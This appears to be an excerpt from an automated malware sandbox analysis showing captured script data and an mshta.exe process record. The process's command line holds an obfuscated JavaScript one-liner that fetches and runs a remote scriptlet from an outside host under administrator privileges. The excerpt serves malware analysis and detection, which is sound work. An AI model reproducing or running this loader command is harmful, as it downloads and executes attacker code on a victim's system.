2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 66 28 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 62 3d 22 32 22 3b 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 76 61 72 20 63 2c 64 2c 65 3d 5b 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 36 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 33 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 5d 3b 66 6f 72 28 63 3d 30 3b 64 3d 65 5b 63 2b 2b 5d 3b 29 74 72 79 7b 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 64 29 2c 62 3d 22 32 22 7d 63 61 74 63 68 28 68 29 7b 7d 7d 61 3d 62 3b 69 66 28 61 3d 3d 22 32 22 26 26 6c 6f 63
    Data Ascii: f(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&loc



                                                Target ID:1
                                                Start time:03:27:59
                                                Start date:01/11/2024
                                                Path:C:\Windows\System32\mshta.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
                                                Imagebase:0x7ff647290000
                                                File size:14'848 bytes
                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000003.1693093843.000001C1782F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C1782F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_3_1c1782f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                  • Instruction ID: 1584a9530ce926d4289673c4feb7f427f9d89edca45571565c5c1c8f7e63a78a
                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                  • Instruction Fuzzy Hash: E49002244D650665F41412910C4569C60406389251FD445904817A0186D94D42969152